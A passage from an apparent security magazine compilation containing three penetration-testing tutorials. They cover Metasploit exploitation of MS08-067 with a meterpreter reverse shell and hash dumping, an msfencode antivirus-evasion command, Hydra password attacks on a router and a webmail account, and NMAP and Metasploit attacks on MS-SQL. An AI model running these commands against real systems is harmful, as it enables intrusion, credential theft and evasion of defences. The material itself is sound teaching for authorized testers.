only required field that is not pre-populated is RHOSTS. To set the fields value you would usually use the
command set RHOST <IP Address>, but we will use the short cut services -p 445 with the -R switch to add all
host with port 445 open to the RHOSTS (Figure 22).
use auxiliary/scanner/smb/smb_enumshares
show options
services -p 445 -R
Figure 22. RHOSTS
As you can see we were able to enumerate the shares on my Myth TV back-end server (Figure 23).
Figure 23. Shares
Earlier you may have noticed that the host 192.168.1.197 was being reported both as a Windows 2000
and XP box, but we also saw that it had port 445 open on it. So lets see if it hasnt been patched and
is susceptible to the MS08-067 vulnerability by actually trying to exploit it! As we mentioned before,
Metasploit has a lot to it, so we need to know the name of the module we will use or somehow find it.
Remember, if you are unsure of how to use a command you can usually add a -h to the end of it, for example
search -h: Figure 24.
THE BEST OF
46
Figure 24. Search -h
Ok, now that we see how to use the search function, lets try finding the MS08-067 module:
search ms08
You should have been returned a list that looks something like this, with the module that we were looking for
listed (Figure 25).
Figure 25. Module listed
Once we have identified the proper module we want to use we can tell Metasploit to use it, and go ahead and
take a look at the options after it loads.
use exploit/windows/smb/ms08_067_netapi
show options
Let me take a minute here and explain the difference between an exploit like this MS08 one, and the
auxiliary module we loaded and used earlier. Once you have all your required fields set you will execute an
auxiliary module with the run command. An Exploit will use the command exploit. But this isnt the only
difference, the main difference between an exploit and auxiliary module is that an exploit needs a payload
in order to do anything, and there werewhatlike 300 payloads available? Each exploit is matched to the
payloads it will work with, not all payloads will work with all exploits. So you will have to identify which
payload you want to use that will work with the particular exploit you are going to use. Once you have
loaded an exploit module you can see which payloads are available to that module with the show payloads
command. Now lets continue....
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
show options
Ah, now you can see that not only are there required fields for the MS08 module, but that there are also
required fields for the Payload (Figure 26).
THE BEST OF
47
Figure 26. Payload
We will keep going and set all these values, but first I want to point out that while LPORT is pre-populated
to listen on port 4444, I usually change this to something that I know will pass, as a lot of companies have
network devices which will only allow certain ports to pass from subnet to subnet, and port 443 is usually
a pretty safe bet. Now we can set our values for RHOST (the remote or target IP address), the LHOST (our
machines IP address), and the LPORT (what port our machine will listen on for connections). Earlier I had
you set your virtual machine on Bridged mode, if we hadnt done that we would have the target host trying
to connect to our Windows Machine first then we would to forward that connection onto our BackTrack
VM! (Figure 27)
set RHOST 192.168.1.197
set LHOST 192.168.1.115
set LPORT 443
show options
Figure 27. Payload options
When you have all of your fields set correctly issue the command exploit and if the host is vulnerable you
will be greeted with the meterpreter > prompt (Figure 28).
THE BEST OF
48
Figure 28. Meterpreter
From here you can do many different things, such as launch post exploitation modules, upload and download
files, take screenshots, dump hashes, etc. After all, you now own that box.
There are a handful of commands I usually run when I first receive a meterpreter shell, these are sysinfo,
hashdump, route, and shell. It is important to look at the routing info on any machine you exploit as it may be a
dual-homed machine and if it is, you can use Metasploit to pivot through this newly exploited machine to a whole
new subnet (Figure 29)!
Figure 29. Meterpreter commands
If you want to keep your meterpreter session alive but continue to try and exploit other hosts use the [Crtl+Z]
key combination and Metasploit will ask you if you want to background that session. To see what active
sessions you have you can always simply type sessions at the Metasploit prompt and you will be shown
which sessions are active. In order to reconnect to a session use the command sessions -i 1. Again you can
always use the -h switch with Metasploit commands (Figure 30).
Figure 30. Sessions
THE BEST OF
49
Brute-forcing
Brute-forcing is a technique that repeatedly tries different combinations of usernames and password to try
and log into a service or break an encrypted password. There are two basic types of attacks dictionary and
rainbow tables.
Dictionary Attacks can be made using dictionary files or lists of passwords, but brute-force attacks also run
through all combinations of character setssay 0-9, A-Z, a-z and special characters. If you know the length
and password policy that a company uses it will greatly cut down on the time it uses to crack a password.
For dictionary files, I would suggest searching the Internet. A good starting point would be Skull Security at
http://www.skullsecurity.org/wiki/index.php/Passwords.
Rainbow table attacks are basically huge files with different character sets that have already been hashed
using all combinations of the set, and will usually crack a password long before a pure brute-force attempt
using dictionary or non-computed hash attempts. If youre interested in rainbow tables, I strongly recommend
checking out Free Rainbow Tables where you can download tables which have already been created with many
different character sets available. You can find them at https://www.freerainbowtables.com/.
One final note on passwords you may decrypt or find users often reuse passwords. Once you find a
password I always add it to my dictionary file. That way as you continue your test you can use those
passwords against other hosts and services.
Network Infrastructure
Another item an internal penetration test should cover is the network infrastructure. There are many different
ways to go about testing the infrastructure including modules inside of Mestasploit. All it takes is one older
or misconfigured Cisco device on the network and you can literally have access to ever Cisco device on
the network. From there you can do things like turn on and off ports, add your host to a restricted list, and
change and monitor span ports.
Cisc0wn
Daniel Compton over at Common exploits has created a nice script called Cisc0wn that will make your life
easier. He describes Cisc0wn this way:
Cisc0wn is simply a bash script that pulls various tools and enumeration into one simple command for
ease, so is not really a tool in itself. It doesnt do anything extra than you cant really already do, it just
saves running several different tools and commands and entering the same info over and over. It uses
Metasploit modules and snmpwalk for most of the tasks.
Cisc0wn can be found at http://www.commonexploits.com/?p=503 along with a nice walk-through of how to
use it. I strongly suggest you check it out when you have the time.
VoIP Networks
Many corporations now run VoIP for their phone networks. If its in scope or you come across a subnet that
has a lot of VoIP devices, dont forget to include these in your tests. Among other things an attacker may be
able to break into is a users voicemail and listen to messages, or perform a man-in-the-middle attack and
actively record users phone calls.
SIPVicious
SIPVicious is simply defined as ... a set of tools that can be used to audit SIP based VoIP systems. It
currently consists of four tools: And its basically that, a tool for auditing SIP based VoIP systems and can
THE BEST OF
50
be found at http://code.google.com/p/sipvicious/. If you have never heard of SIPVicious and are unfamiliar
with it, I would also recommend checking out http://blog.sipvicious.org/.
Databases
Databases can be a particularly interesting subject and could very well be an entirely separate article.
Companies store all sorts of information in databases. In some cases everything is open game, but I have had
certain tests where the company stores personally identifiable information or PII, and have said go ahead
and try and exploit the databases. BUT they wanted me to stop at the table level, and not actually look at the
contents. This is very important STOP where the client tells you to, remember you document, you are only
allowed to test what they want you to, and only as deep as they would like.
BackTrack has quite a few tools built in for Databases, you can access these by going to the Applications>
BackTrack> Vulnerability Assessment> Database Assessment.
Metasploit also has a lot of function built around databases, I suggest you start by looking at the auxiliary
modules first.
auxiliary/scanner/mssql/mssql_hashdump
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mssql/mssql_ping
auxiliary/scanner/mssql/mssql_schemadump
auxiliary/scanner/oracle/oracle_hashdump
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/oracle/sid_brute
auxiliary/scanner/oracle/sid_enum
auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_fle_enum
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version
Camera systems: https://community.rapid7.com/community/metasploit/blog/2012/01/23/video-conferencing-
and-self-selecting-targets.
Protocal Analysis
At some point you may find yourself needing to look at whats going on, on the network, or need to do some
packet analysis. Were not going to talk about that here, but it is something to be aware of.
THE BEST OF
51
Wireshark
Wireshark is the worlds foremost network protocol analyzer. It lets you see whats happening on your
network at a microscopic level. It is the de facto (and often de jure) standard across many industries and
educational institutions. and can be found at www.wireshark.org. Again this is something else for you to
play with. Fire it up on your test or home network, and I think youll be surprised at what you see.
Default Passwords
Default installs and configurations are often left with the default username and password. If you come across
a login page to say a router, web application, camera system, etc. Its always worth Googling for the specific
device or software (and sometimes version) + default password, as you will be surprised as to how often
someone sets up a device or installs some new software, configures it, then just leaves the default login.
Additionally, if you are having a hard time finding the default go ahead and look for the setup or installation
guide since they will let you know whether or not there is a default password. Manufacturers are becoming
more security aware and do not have defaults anymore and instead require the user to input their own
password during initial setup.
Evading Anti-virus
Undoubtedly you will find some machine that you should be able to exploit, but try as you may, you just cant
get it to work! Most likely the culprit will be some type of anti-virus. There are things you can do to get around
AV but again, thats well beyond the scope of this article. With that said, a safe place to start is the Metasploit
Framework, included is a tool called msfpayload and msfencode which allows you to encode your payload with
quite a few different options. You may have to try and try again utilizing different options before you will be
actually get your payload to bypass the AV. The basic format of the command will look like this:
msfpayload windows/meterpreter/reverse_tcp LHOST=
192.168.1.115 R | ./msfencode -t exe -x calc.exe -k -o
exploit.exe -e x86/shikata_ga_nai -c 5
Reporting
Remember we said earlier that the whole point of penetration testing, is not only to find the holes before an
attacker would, but also to deliver a report to your client with actionable items. I create all of my reports by hand.
What I do is show the workflow that I followed during the test and include pictures where needed.
Remember that this report may go through quite a few hands and you may want to show step-by-step how
you exploited a specific device, since there may be a technical person who would want to recreate the steps,
or test them again after the vulnerability has been remediated. Another thing I show is the number of overall
vulnerabilities that I was able to identify during a test. If you have a client who performs yearly testing they
may use these numbers as metrics at some point to show that, for example, last year they had 500 critical and
high severity issues, but this year they only have 75.
I always make recommendations based on my test. For instance, I may see that a client is still using Telnet
or FTP, which pass everything (including user credentials) unencrypted and in the clear, and if someone is
sniffing the traffic (remember Wireshark?) they can easily harvest the credentials of any user logging into
those systems.
Since I use Nessus and Core Impact, one final thing I include is my scan data in the form of a report.
There may be some system on the network with a vulnerability that I did not get around to exploiting,
or there may be no publicly available exploits. This doesnt mean that there wont be some released in
the future and I always recommend that these issues be remediated. The great part about a lot of these
reports is that they include links to the original vulnerability along with the fix, and that translates to less
questions that I have to answer or follow up on!
THE BEST OF
Conclusion
Hopefully you have found this article informative and now have a better idea of where to start when
performing penetration tests. Since this was an article for a magazine realizing there is a limited amount
of space, there may have been some things that I couldnt cover in as much depth as I would have liked.
But Google is your friend, and the information is out there. One thing that I touched on, but did not go into
details on is the testing of web applications. That subject alone would have more than tripled the size of this
article. If you are interested in the penetration testing of web applications I would suggest taking a look at
w3af and Burp Suite which can be found at http://w3af.org/ and http://portswigger.net/burp/.
One final note; you will want to be aware of compliance. Many of your clients will be having a penetration
test done in order to be in compliance with requirements such as like PCI-DSS, for an audit, or meet some
other regulatory or industry standard. If you are engaged for such a test, make sure you know that your
methodology and test plan will meet their compliance needs as many of them require particular items be
tested in a specific way.
About the Author
Nick Hensley having held his CISSP since 2002 is a seasoned Information Security Professional with
12 years of industry experience. He currently manages a team of penetration testers; and performs
penetration and application security testing along side his team, supporting roughly 150 different clients.
His background covers a broad range of managerial and technical positions. Nicks expertise lies in
Penetration Testing, Computer Forensics, Electronic Discovery, Intrusion Detection and Prevention
Systems, and Security Architecture Design and Implementation. He can be reached via email at
NickHensleyCISSP@gmail.com.
advertisement
THE BEST OF
53
Using Hydra To Crack The Door Open
by Nikolaos Mitropoulos
Take advantage of a cracking tool to test the resilience of your local or remote network
servers and various other devices from a computer to a router on the network.
The complexity of security range from basic computing systems to more intricate industrial systems with
biometric locks or weapons like quantum computing that will come into play in the future.
The more important the data is, the tighter the locks must be. The security countermeasures can range from simple
to more elaborate as we climb the ladder of importance of the information to be protected. A chain is as only as
strong as its weakest link.
Figure 1. Base memory size used in VirtualBox installation
If the password of the administrators is not secure enough, then the attacker may use privilege escalation to get to
the data thwarting any attempt to keep them from the myriads of attackers who seek to gain direct access to them.
If upfront, we keep the front door heavily fortified then the malicious persons will go to the next available building
to try their luck. Hence, the password strength of your local network access or network devices or even remote
servers and other devices is a critical step to prevent attacks. Below highlight some of the rules to achieving e
strong passwords. Basic password creation rules:
A minimum password length of 12 to 18 characters.
Include numbers, upper and lower case combinations as well as symbols, if the system allows it.
Avoid names or important personal information that someone else also knows, e.g. your fathers name or
your date of birth.
Use password generator (where feasible).
Store them in special applications with master password set and not using post-it notes or handwritten
information hidden at your desk.
THE BEST OF
54
Change any default passwords.
Make intentional typos that only you know.
Do not use the same password for all your systems.
Change your password frequently.
So, now you know the rules. But how do you ensure that your passwords are strong enough and not too
complicated to remember? How can you evaluate the strength of your password? You can use tools, in
Backtrack to test your password resilience.
Figure 2. Hard disk size used in VirtualBox installation
Installing Backtrack on VirtualBox
There are three ways to operate Backtrack.
Install it to your computer.
Run it through a live CD
Install it on a virtual environment as like VirtualBox or Vmware.
I am going to demonstrate how to work with Backtrack installation in VirtualBox. In order to achieve this,
you have to download two components:
latest VirtualBox version (can be found at https://www.virtualbox.org/wiki/Downloads)
Bactrack image to use for VirtualBox (can be found at: http://www.backtrack-linux.org/downloads/ )
Once you have all the above, you can begin the installation of VirtualBox. Do keep two things in mind.
Allow larger memory space and hard disk to be allocated during installation, like you see in the two above
screenshots (Figures 1 and 2). I use at least 1024 MB for memory and a hard disk of larger than 10 GB of
size. All other settings you can leave to as default. Use the Backtrack .iso to input in this VirtualBox instance
and run it to complete the installation process. One last thing, be patient during final installation as you may
THE BEST OF
55
see the bar slowing at 99%.. Do not abort and you will eventually see the following message: Figure 3.
Figure 3. Installation completion message from Backtrack
The password tools in Backtrack are located in the following path: Backtrack Privilege Escalation
Password attacks, as you can also see in Figure 4.
Figure 4. Backtrack password cracking tools
In our next example we will use nmap, also existing in Backtrack, which is an open tool for network
discovery and security auditing. Since this article intent is not to demonstrate nmap usage, I will only tell
you that one of the most famous of its features is port scanning. So, if you have a computer or a router or
whichever device at the network, you can use its IP address with nmap to see which ports are open on it. I
have my router at the local network with IP of 192.168.1.1 and I want to run a port scan on it to see what the
open services are. So, I use the command: nmap 192.168.1.1. So, as you can see in Figure 5, my device has
TCP ports 21, 23, 53, 80 and 5555 open. Nmap, in this mode, has scanned a total of 1,000 ports.
THE BEST OF
56
Figure 5. Using nmap to perform port scanning at 192.168.1.1 (routers IP)
I will move on to introducing Hydra, which is a well-known tool for dictionary attacks on various devices
(you can find it in sub-path Online Attacks of the pre-mentioned Backtrack structure). Alternatively, if you
are using Windows, you can try to download Cygwin and run the tools from there.In this example, I will use
Hydra to target my router in order to perform a dictionary attack on the password. I will use a dictionary.
txt which I will populate and increase the number of words as time goes by. I have modified it for this
demonstration purpose to use 30 passwords. The parameters that Hydra accepts: Listing 1.
Listing 1. Hydra parameters of operation
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS]
[-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server
service [OPT]]|[service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type -x -h to get help
-e nsr try n null password, s login as pass and/or r reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated login:pass format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V verbose mode / show login+pass combination for each attempt
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: cisco cisco-enable
cvs firebird ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy
http-proxy-urlenum icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql
ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp
rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh svn teamspeak
telnet vmauthd vnc xmpp
THE BEST OF
57
The command string to be used to attack the router along with its arguments is as follow:
hydra -V -l admin -P /root/Desktop/dictionary.txt
-t 36 -f -s 80 192.168.1.1 http-get /
So we are essentially telling Hydra to use the username (which in this scenario will only be admin) and password
combination used every time (-V), with username admin (as in most router cases but if we want, another dictionary
can be used here for usernames), specifying the password file to be used (-P), we specify number of connections
in parallel tasks (-t), exiting after first successful crack (-f), port to be used is 80 (http port which is open as nmap
showed earlier), IP address of the router is 192.168.1.1 and protocol is http-get (usually it is either get or post).
Notice the character / at the end of the line which specifies to attempt to crack at the root page (it is actually like
saying try the login credentials at index.html). The output we get is shown in Figure 6.
Figure 6. The output of the attempt to crack the password of the router at 192.168.1.1
From what you can see, the password search wasnt really successful so the program just concludes its
execution. As already stated earlier, try to have one basic principle at mind: The better variety and size the
original dictionary has, the better the result will be. Let us try a different approach this time by attacking the
routers ftp protocol, using the command string that follows. This time, we tell Hydra to try a null password and
to use login credentials as password in addition to what we did earlier.
hydra -V -l admin -P /root/Desktop/dictionary.txt
-e ns -f -s 21 192.168.1.1 ftp
If you are not a command line addict, you can use the GUI version of Hydra. For instance, checking on the
parameters will represent the same settings as the above command line: Figure 7 and Figure 8.
THE BEST OF
58
Figure 7. Hydra settings in target tab
Figure 8. Hydra settings in passwords tab
If you want to change the task number you can use the Tuning Tab and as you soon as you set everything go
to the Start tab and begin the application. After, that you can save your output for future inspection.
For example, I have the below output from my test:
While the two additional lines at the end state:
[ATTEMPT] target 192.168.1.1 login admin pass enti4752
[21] [ftp] host: 192.168.1.1 login: admin password: enti4752
So to verify that this is indeed true, I will ftp to 192.168.1.1 using admin as username and enti4752 as password.
Figure 9. Connecting through ftp to 192.168.1.1
THE BEST OF
59
Lets see one more example of using Hydra but this time to crack yahoo mail accounts (same logic applies to
gmail or hotmail or all other mail servers). We use the following settings:
Simple target: smtp.mail.yahoo.com (Yahoo server)
Protocol: smtp
Port: 465
Enable also: SSL, verbose and show attempts.
The name that we specify as target is the mail account that we are attempting to crack, so in my example I
put my account and I also specified a dictionary for the attack, which is the same one that I have been using
throughout this presentation (Figure 10 and Figure 11).
Figure 10. Hydra Target tab settings for cracking yahoo passwords
Figure 11. Hydra Passwords tab settings for cracking yahoo passwords
THE BEST OF
60
If we choose now to start Hydra you will notice an output as the one in Figure 12. I have shortened the
dictionary to limit the time to execute as well as to shorten the output in order to focus at the result.
Figure 12. Attacking yahoo mail account and revealing the password
While an additional line at the end will state:
[25] [smtp] host: 188.125.69.59 login:
zeroout2003@yahoo.gr password: backtrack
If I use the above credentials I will be able to successfully login to my mail account using the standard web
page at https://login.yahoo.com/.
Summary
The above article clearly shows how easy it is to target system. We have used nmap as a network scanner,
and the supporting protocols and functions of Hydra.
As we already stated through the course of this article, when dealing with dictionary attacks, the tools are as
strong as their internal dictionaries and also the processing power that someone has at his disposal in order to
combine the dictionary attack with proper brute force cracking capability. There are also a lot of other tools
in Backtrack which include online and offline password cracking such as rainbowcrack, John the Ripper,
medusa, ncrack and much more others that are worth dissecting in other articles.
For instance, John the Ripper has the ability to crack password hashes, so if we get the hashed contents of a
password file, the application can discover the initial plain text form through a variety of hashed passwords.
You will be amazed that many people still use default passwords or just simple words as passwords.
Never underestimate how simple-minded users or system administrators can be. I am sure you can remember
the old movie Hackers, the passwords referenced are: love, secret, sex and God. You wouldnt
believe how many people use these words as their passwords.
About the Author
Nikolaos Mitropoulos has been working for over a year as a network security
engineer for AT&Ts Managed Security Services team. He is Cisco and Juniper
certified (holding CCNA, JNCIA and JNCIS-SEC certifications). In the past four years
he has focused in teaching at various education levels varying from professor of
secondary education level courses to demanding corporate classes for professionals
dealing in multiple aspects of the networking and security fields. His hobbies are
steganography, digital watermarking and building penetration testing skills.
THE BEST OF
61
NMAP and Metasploit for MS-SQL
Auditing
by Jose Ruiz
NMAP is the best network scanner tool that you can find, period. Also, Metasploit is the
#2 security tool today according to sectools.org so its a must for any security professional.
Both tools can help you find flaws that are present in your systems before the bad guys do.
In this article we will learn how to use NMAP and Metasploit to scan and exploit an MS-
SQL Server, as a bonus we will see how easy it is to set up an automated log to record your
findings, so your reporting duties are a lot easier.
Databases are a necessity in this time and age of technology. A database is a collection of information
organized in a way that allows the user the use of queries to select any type of data quickly. This data
includes usernames, passwords, emails, phone numbers, addresses, credit card info, purchase records,
inventory, etc. Many of these databases are exposed to the public via a web app that allows the user to
interact with it by using a form or a search box. If you set up a database the wrong way you can expose your
company to all sorts of vulnerabilities, like XSS, or SQLi. Also, by leaving the defaults, almost anyone with
a fair knowledge of tools can scan you and get info about the server, login information, tables, etc. Here we
are assuming that you are testing your own servers so we will not be talking about anonymity or anything
like that. This is an engagement where you are testing stuff from your place of work so the reporting should
be a priority here. This article assumes that you are using Backtrack 5R3.
Figure 1. NMAP scripts to analyze MS-SQL Servers
NMAP
NMAP is a security scanner written by Gordon Lyon and its mainly used to discover Host and services on a
computer network, thus creating a map of the network. NMAP has lots of features that allow you to see
networks such as host discovery, service and operating system detection, etc. One of the coolest features, and
the one we will use today, is the NSE or NMAP Scripting Engine. These scripts can perform more advanced
service detection, vulnerability analysis, and even brute forcing. For now we will focus on just scripts to
THE BEST OF
62
analyze MS-SQL. To see a full list of the scripts that are related to MS-SQL go to your terminal and type this
cd /opt/metasploit/common/share/nmap/scripts (Figure 1). These are the scripts that we have available and they
can be used with multiple arguments to augment their power as we will see later on. The first thing well do
is scan our network for MS-SQL servers (Figure 2).
Figure 2. NMAP found an example of MS-SQL running on our network
After weve found an example of MSSQL the next thing we should do is try to get more info from the machine
so we run the ms-sql-info script (Figure 3).
Figure 3. NMAP finds that our server has not been patched
The next thing is to find if any account has an empty password (Figure 4).
THE BEST OF
63
Figure 4. As you can see the script gives us no results
We can conclude that the server does not have a user with empty passwords. At this point the next step will
be to attempt a brute force attack on the server. Of course if password lockout policies are on effect you will
end up getting everyone unable to login. Try to perform these tests on a non-working day so you can later
unblock the accounts for the users. Also this test will help you monitor how good your IDS/IPS system is
working as these types of attacks are extremely noisy (Figure 5).
Figure 5. NMAP brute force attack
Its really nice to know that with NMAP you can add additional arguments in order to use the brute force
script with your own user or password list. This way you dont need to rely on the default lists. This shows
you how powerful NMAP really is. So far weve discovered an MS-SQL instance running on a server that
is not fully patched and whose login information is user sa (default MS-SQL admin user) with password1
THE BEST OF
64
as its password. If you know SQL all you have to do now is login to the server and do whatever you
want. However, instead of doing that, we will continue testing our NMAP scripts. Lets try to find some
configuration information (Figure 6).
Figure 6. NMAP Configuration script results
The thing to notice here is the xp_cmdshell. NMAP has a script to pass commands through this option but
only if its open or activated. The results show that its closed so this wont work with NMAP but then again,
theres Metasploit! Another script that will produce results is this (Figure 7).
Figure 7. NMAP provides us with the table info on our MS-SQL server
Lets look at the last two scripts we will test (Figure 8). Here you can see that you are able to pull the
database name and the username of the creator. This is a good way to see other usernames so you can get a
better idea of how many people access this MS-SQL instance. The last script allows you to pull the hashes
THE BEST OF
65
of the available users. Once you have this you dont need to attack the server directly, you can move on to an
offline attack with tools like John the Ripper and try to crack the hashes to get more credentials.
Figure 8. NMAP script to obtain database owner info and user hashes
We have covered essentially what your possibilities are with NMAP against any MS-SQL server. As you can
see there is a lot of info that can be gathered, especially if you are able to find a valid credential to access the
MS-SQL instance. If you refer back to Figure 3 you will notice that once this MS-SQL Server software was
installed, it never received additional patching. This opens the door to a lot of possible vulnerabilities and its
our cue to move on into Metasploit.
Metasploit
Metasploit is a framework that provides the infrastructure needed to automate multiple tasks needed in order
to assess and/or exploit vulnerabilities found in a host. It provides multiple tools that allow you to scan almost
any host and check for security holes that later can be exploited by using one or many of its catalogs of exploits.
Still, beware, this is not a magical point and click tool. Just because you may find misconfigured things via their
scanner modules doesnt mean that there is an exploit guaranteed to work. Sometimes you need to modify the
actual exploit code and sometimes they just wont work.
Metasploit was developed by HD Moore to be able to have a flexible and maintainable framework for the
creation and development of exploits that will save him time from having to validate and sanitize public
exploit code. His first iteration had 11 exploits. Now you can find well over a thousand exploits as well as
auxiliary modules and NOPS. Today, Metasploit is a necessary tool for penetration testing and exploitation.
To get Metasploit running you can follow the path stated on the next figure (Figure 9).
THE BEST OF
66
Figure 9. Accessing Metasploit
Wait for the console to load and when you get a cool banner followed by the msf> prompt you are ready to work.
Figure 10. Metasploit scanners for MS-SQL
Using metasploit to test MS-SQL
The first thing you should do when testing a host with Metasploit is to gather some information. Metasploit
provides many scanners for these purposes. As we can see here, a quick search produces the following results
(Figure 10). Theres another interesting folder called admin but its left for you to explore its options and try
them. When we analyze the results we see stuff that allows us to get info very similar to what NMAP got us
earlier. As an example, lets see what the mssql_ping scanner shows (Figure 11).
THE BEST OF
67
Figure 11. A login scanner module results
Check the commands in the previous figure to understand how to see available options, load required values
and run the module. I included the password because we got it with NMAP but as you can see its not a
required value. Once you run the module you get a result very similar to the NMAP ms-sql-info script.
This shows that NMAP is a really amazing tool that can get interesting info out of a host, not just open ports.
Based on this we dont need to use the other scanners because we already got that info. So the next step is to
explore possible exploits (Figure 12). You can try them all but if you load the mssql_payload and read its info
you will find something really interesting (Figure 13).
Figure 12. Possible MS-SQL exploits
THE BEST OF
68
Figure 13. mssql_payload Exploit info
Remember earlier that we found the xp_cmdshell service on our MS-SQL server with NMAP? It was off but
this exploit will try to activate before passing the payload so its worth a try (Figure 14).
Figure 14. Setting the options for our exploit
Now what we need to do is set a payload. A payload is a piece of code that we want to execute right after
our exploit runs successfully against our target. It allows us to do a task such as add a user, open a command
prompt in windows, or a terminal in Linux so we can explore the machine, etc. There is a special payload called
Meterpreter that is considered the mother of all payloads because it allows so much flexibility once executed.
It also contains auxiliary modules that let you run tasks inside the machine like get hashes, screenshots, start a
keylogger, create interactive shells, plant backdoors, upload and execute software into the target, etc. Good for
us that we have the option to use Meterpreter here because not all exploits support it as a payload. (Figure 15).
Figure 15. Setting Meterpreter as our payload
THE BEST OF
69
We are using a bind type of payload, if there are firewall rules that block outside hosts connection attempts
going into other machines than those established by the rules, this wont work; so you may want to try using a
reverse type of connection so the victim connects to you. If the firewall also filters connection attempts from
internal PCs to unknown hosts then you are out of luck. Now we are all setup so we verify our options once
again and type exploit to start the exploitation attempt. (Figure 16).
Figure 16. Verifying our options and sending the exploit
Here you can see our exploit trying to start the xp_cmshell service (Figure 17).
Figure 17. xp_cmshell service
Once the whole process is finished if it was successful then the payload will pass and we will see a
Meterpreter shell opened (Figure 18).
Figure 18. The meterpreter shell
THE BEST OF
70
Now you can type help to explore all options. As an example we can type the command shell and explore
(Figure 19).
Figure 19. shell command
As you can see, once inside the command prompt you can explore anything you want and check that you are
inside the right machine by checking its IP address. From here your task is to explore other Meterpreter commands.
At this point we are done with our task as we successfully scanned and exploited the MS-SQL service installed.
Now lets move on
Bonus: Setting Up An Automated Reporting Script
When you do any type of engagement it is really important that you make sure you are logging every step
of your process so later you can document it for your boss. The problem is that you dont want to be writing
down everything. Heres where a little bash comes to the rescue. The following script will allow you to
create a folder for your job and save your log inside with a name based on the date of the engagement. If you
cant finish it in one day or have to stop, no problem, the script allows you to create another log and save it
in the same folder without overwriting previous logs. The nice thing is that once the log is created the script
calls Metasploit, loads it, and tells it to save all input to the log you just created! Heres the script (Please use
it without changing the authors names). Copy the script and save it as startMSFCONSOLE.sh then run chmod 744
startMSFCONSOLE.sh to make it executable. To use it type ./startMSFCONSOLE.sh (Listing 1-3).
Listing 1. The script option 1
#!/bin/bash
# This script creates a timestamp and then sets it as a name for our metasploit activity log Then
calls metasploit and invoke
# the log to start collecting info. It offers the option of creating a new project folder to save
your logs or to select an existing # project folder to continue saving information. Script was
created during a Metasploit workshop with Carlos Perez where he # suggested the Timestamp Output
Spool as a better alternative to keep logs from projects...
# Pedro Ortiz / Jos Ruiz - May 2013
clear
echo
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo TIMESTAMP OUTPUT / SPOOL - REPORT LOG ATOMATION SCRIPT
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo
echo Select Your Option
echo
echo --------------------------
echo 1 - New Project Report
THE BEST OF
71
echo 2 - Continue Previous Project
echo 3 - Exit Script
echo
read -p >>> option
echo
# OPTION 1 - Create a new folder for a new project engagement...
if [ $option = 1 ]; then
read -p New Project Folder: folder
mkdir $folder
cd /root/$folder
echo
d=$(date +%Y_%m_%d_%H_%M)
echo Your log: $d
echo
echo Loading msfconsole... Please Wait...
set TimestampOutput true > /root/$folder/autolog.rc
echo spool /root/$folder/$d.txt >> /root/$folder/autolog.rc
msfconsole -r autolog.rc
fi
Listing 2. The script option 2
# OPTION 2 - Create a new log inside an existing
folder to continue a previous engagement...
if [ $option = 2 ]; then
read -p Existing Project Folder: folder
cd /root/$folder
echo
d=$(date +%Y_%m_%d_%H_%M)
echo Your log: $d
echo
echo Loading msfconsole... Please Wait...
echo set TimestampOutput true > /root/$folder/autolog.rc
echo spool /root/$folder/$d.txt >> /root/$folder/autolog.rc
msfconsole -r autolog.rc
fi
Listing 3. The script option 3 i
# OPTION 3 Exit
if [ $option = 3 ]; then
echo
echo Closing Script...
echo
sleep 2
clear
exit
echo
fi
# ERROR CORRECTION
if [ $option -gt 3 ]; then
echo
echo Invalid Selection... Returning to Main Menu... Please wait...
echo
sleep 2
./startMSFCONSOLE.sh
echo
fi
THE BEST OF
72
Okay, so once you get you script operational, lets see what it does: Fgure 20-22.
Figure 20. Calling the script to create your log
Figure 21. Creating a new project folder
THE BEST OF
73
Figure 22. Metasploit loaded Notice the last lines where it tells you that your log information is being
saved on the folder you just created. Once you get here you are ready to work
If we run an NMAP scan from within Metasploit, you can save it to your log. Lets see (Figure 23).
Figure 23. Calling NMAP from within Metasploit
Now lets check our newly created log to see if its doing what it is supposed to do (Figure 24, 25 and 26).
THE BEST OF
74
Figure 24. Our Hackin9 folder
Figure 25. Our log
As you can see here, every step of the process gets recorded for easy reference later when you are writing
your report.
THE BEST OF
75
Figure 26. Part of our collected info
Conclusion
We have explored the possibilities that NMAP has to offer to scan and analyze MS-SQL servers.
The scripting engine is a powerful tool that can help you explore lots of different things. Go ahead and experiment
with the additional possibilities. To do this, set up different services or apps like IIS, web sites, Oracle etc. and scan
those using the scripts provided to work with them. Also we were able to see the possibilities that Metasploit has
to offer and leave you with the task of comparing them to NMAP to see which works better and why. Finally, the
bonus script will help you collect the info and save it for reporting so your homework now is to repeat this tutorial
but creating the folder and log first. Also take notice of how NMAP behaves inside Metasploit. Enjoy!
About the Author
Jose Ruiz is an independent consultant specializing in the areas of physical and logical
